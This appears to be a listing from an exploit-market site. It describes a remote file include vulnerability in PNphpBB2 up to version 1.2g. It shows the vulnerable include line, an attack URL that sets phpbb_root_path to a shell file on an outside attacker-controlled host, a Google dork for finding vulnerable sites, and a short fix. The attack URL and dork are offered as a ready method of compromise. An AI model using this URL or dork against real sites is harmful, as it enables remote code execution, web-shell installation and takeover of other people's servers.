[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability

Author
AzzCoder
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-855
Category
web applications
Date add
17-09-2006
Platform
unsorted
====================================================================
PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability
====================================================================



Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2



#  0day.today [2024-07-05]  #